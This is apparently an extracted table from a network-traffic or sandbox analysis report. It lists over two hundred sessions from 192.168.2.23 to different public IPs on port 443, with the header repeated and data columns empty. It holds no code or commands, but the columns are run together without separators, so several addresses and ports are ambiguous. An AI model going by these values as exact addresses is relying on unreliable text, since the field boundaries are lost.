                                                21244192.168.2.2343988149.57.218.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21245192.168.2.2357054217.217.138.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21246192.168.2.233669224.117.115.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21247192.168.2.2360858141.199.244.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21248192.168.2.2345872190.235.181.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21249192.168.2.2350164157.231.127.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21250192.168.2.235659292.186.42.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21251192.168.2.234001273.108.130.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21252192.168.2.2341964131.69.47.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21253192.168.2.235358019.246.16.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21254192.168.2.234560214.65.36.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21255192.168.2.2342060175.127.74.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21256192.168.2.234544272.123.123.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21257192.168.2.2347420205.57.152.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21258192.168.2.235983434.127.177.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21259192.168.2.2332794204.65.61.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21260192.168.2.2333104189.25.71.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21261192.168.2.2352418196.129.9.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21262192.168.2.2338916193.72.141.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21263192.168.2.2346940141.73.227.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21264192.168.2.2335478223.137.112.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21265192.168.2.234062875.109.240.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21266192.168.2.2343218170.238.157.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21267192.168.2.233601079.120.51.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21268192.168.2.233695464.5.46.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21269192.168.2.2346580184.182.76.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21270192.168.2.234777473.229.214.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21271192.168.2.2352910103.160.61.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21272192.168.2.2340054220.38.1.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21273192.168.2.234998694.159.167.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21274192.168.2.2358520169.104.13.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21275192.168.2.2350066116.172.196.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21276192.168.2.233620862.163.212.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21277192.168.2.2353316122.23.146.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21278192.168.2.235893247.169.180.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21279192.168.2.2339826129.90.72.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21280192.168.2.2356568186.57.174.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21281192.168.2.2334230221.159.18.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21282192.168.2.236094827.107.201.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21283192.168.2.2348420183.128.253.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21284192.168.2.2352906102.76.88.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21285192.168.2.2333010221.150.11.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21286192.168.2.2357248137.29.165.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21287192.168.2.2352436195.143.93.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21288192.168.2.2360632206.135.85.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21289192.168.2.2346662206.86.29.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21290192.168.2.234530636.132.80.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21291192.168.2.234078247.192.111.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21292192.168.2.2334672221.223.96.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21293192.168.2.2353936128.234.146.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21294192.168.2.234771652.177.235.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21295192.168.2.2355040161.115.247.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21296192.168.2.2343094196.189.18.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21297192.168.2.235354048.110.6.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21298192.168.2.2360112171.64.39.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21299192.168.2.2333878112.20.59.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21300192.168.2.233362840.35.58.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21301192.168.2.234571212.33.155.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21302192.168.2.2342816188.213.164.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21303192.168.2.235446495.7.129.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21304192.168.2.2352202209.249.40.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21305192.168.2.2354538113.158.82.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21306192.168.2.2332784124.85.68.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21307192.168.2.235495853.100.160.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21308192.168.2.233927657.85.219.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21309192.168.2.234484245.52.211.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21310192.168.2.234638824.27.146.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21311192.168.2.234735650.249.60.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21312192.168.2.23471189.198.154.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21313192.168.2.233814068.143.72.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21314192.168.2.2349242110.253.46.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21315192.168.2.235744424.137.96.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21316192.168.2.2340202126.45.60.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21317192.168.2.2350650193.100.133.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21318192.168.2.2350220121.64.112.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21319192.168.2.2338522218.252.66.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21320192.168.2.2342036217.119.211.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21321192.168.2.2335656176.163.181.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21322192.168.2.234380632.39.138.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21323192.168.2.2342406114.243.204.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21324192.168.2.2359958113.173.57.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21325192.168.2.234133061.178.173.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21326192.168.2.234591044.70.3.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21327192.168.2.233913690.219.150.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21328192.168.2.2355314106.76.38.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21329192.168.2.2346254170.134.251.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21330192.168.2.2355014218.214.133.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21331192.168.2.2360356176.25.13.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21332192.168.2.235208479.212.165.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21333192.168.2.2359480120.81.124.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21334192.168.2.234924042.59.201.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21335192.168.2.2335110155.18.170.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21336192.168.2.233794824.148.40.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21337192.168.2.2347238204.52.246.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21338192.168.2.2355558223.69.35.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21339192.168.2.2334182207.7.39.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21340192.168.2.2359748144.163.214.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21341192.168.2.235321651.38.146.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21342192.168.2.2356220210.53.189.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21343192.168.2.2334878168.99.30.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21344192.168.2.2352072221.154.132.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21345192.168.2.2354938150.222.99.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21346192.168.2.2338000145.86.232.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21347192.168.2.2349896172.89.128.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21348192.168.2.235762219.47.84.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21349192.168.2.234170273.166.88.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21350192.168.2.2350974139.191.243.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21351192.168.2.2357670136.162.205.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21352192.168.2.2336370150.120.145.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21353192.168.2.233983484.188.245.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21354192.168.2.233481273.36.26.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21355192.168.2.2337804185.172.162.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21356192.168.2.2351302147.37.166.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21357192.168.2.2357740140.252.22.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21358192.168.2.2357082143.186.202.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21359192.168.2.2355390129.222.85.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21360192.168.2.233754037.165.203.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21361192.168.2.2351248189.25.27.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21362192.168.2.2352788176.227.114.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21363192.168.2.2355600208.222.86.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21364192.168.2.235293658.141.19.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21365192.168.2.2344488182.96.161.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21366192.168.2.2350870184.129.158.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21367192.168.2.2350392212.161.117.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21368192.168.2.233521466.17.109.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21369192.168.2.2343772117.213.156.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21370192.168.2.2333712191.73.230.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21371192.168.2.2339022142.168.226.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21372192.168.2.2360446218.249.13.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21373192.168.2.2347768132.76.236.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21374192.168.2.233617067.25.60.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21375192.168.2.2349214146.65.193.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21376192.168.2.2347684220.13.114.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21377192.168.2.2340288128.50.119.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21378192.168.2.23456208.177.16.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21379192.168.2.2356798135.20.179.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21380192.168.2.2347028112.251.84.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21381192.168.2.233589890.59.146.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21382192.168.2.233768638.41.116.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21383192.168.2.2338986100.250.183.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21384192.168.2.2337858212.101.68.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21385192.168.2.234483882.183.62.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21386192.168.2.2341622158.129.74.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21387192.168.2.233853431.26.112.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21388192.168.2.2349754143.199.91.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21389192.168.2.235908845.233.191.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21390192.168.2.2360424209.187.217.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21391192.168.2.23355902.31.178.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21392192.168.2.235170031.150.148.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21393192.168.2.234261450.207.237.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21394192.168.2.234753489.174.149.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21395192.168.2.2359664156.248.31.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21396192.168.2.2351408190.228.57.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21397192.168.2.234597861.188.7.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21398192.168.2.235697268.40.122.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21399192.168.2.2337498209.144.129.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21400192.168.2.234710485.71.99.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21401192.168.2.2351458185.127.77.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21402192.168.2.234405643.28.157.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21403192.168.2.233506677.35.170.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21404192.168.2.235358251.67.7.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21405192.168.2.2347978213.173.128.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21406192.168.2.2342116219.72.177.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21407192.168.2.233568018.238.225.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21408192.168.2.233452084.143.78.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21409192.168.2.2345440157.249.194.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21410192.168.2.2357670162.189.121.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21411192.168.2.234166680.213.188.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21412192.168.2.2354002151.125.147.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21413192.168.2.23540085.215.14.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21414192.168.2.233612865.63.252.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21415192.168.2.2342334159.146.7.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21416192.168.2.235270287.0.182.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21417192.168.2.235254454.128.128.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21418192.168.2.2335102207.220.7.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21419192.168.2.2359220108.34.159.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21420192.168.2.2339022140.40.2.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21421192.168.2.236007414.231.59.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21422192.168.2.2359270166.36.151.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21423192.168.2.2338166139.75.75.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21424192.168.2.233834632.164.19.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21425192.168.2.235053851.114.10.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21426192.168.2.2353992201.243.104.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21427192.168.2.235631698.17.124.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21428192.168.2.234395877.165.5.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21429192.168.2.233884684.231.237.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21430192.168.2.2350846140.157.11.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21431192.168.2.2345602186.112.154.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21432192.168.2.235261423.81.34.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21433192.168.2.233892260.221.170.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21434192.168.2.2359434180.238.116.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21435192.168.2.2359690212.110.136.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21436192.168.2.233312847.3.108.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21437192.168.2.2359322173.86.229.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21438192.168.2.2334998143.220.245.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21439192.168.2.235208447.140.7.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21440192.168.2.2347500131.135.202.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21441192.168.2.2343632144.151.240.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21442192.168.2.236079871.130.22.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21443192.168.2.234642038.43.143.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21444192.168.2.234697080.208.14.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21445192.168.2.234477841.82.186.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21446192.168.2.2356512188.4.182.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21447192.168.2.2340134113.204.62.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21448192.168.2.2355982140.232.46.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21449192.168.2.2346982133.76.34.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21450192.168.2.2338336197.6.225.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21451192.168.2.2358070217.70.45.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21452192.168.2.2352542168.163.168.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21453192.168.2.2333564195.48.214.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21454192.168.2.2343830118.246.130.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21455192.168.2.235722252.142.96.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21456192.168.2.235309493.92.170.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21457192.168.2.2359804100.222.86.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21458192.168.2.233917480.78.141.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21459192.168.2.234930258.228.130.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21460192.168.2.2348830147.64.169.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21461192.168.2.2335120105.212.206.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21462192.168.2.2359956153.54.34.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21463192.168.2.2342264111.165.97.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21464192.168.2.2351588200.204.59.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21465192.168.2.234429841.141.16.44443
                                                TimestampBytes transferredDirectionData


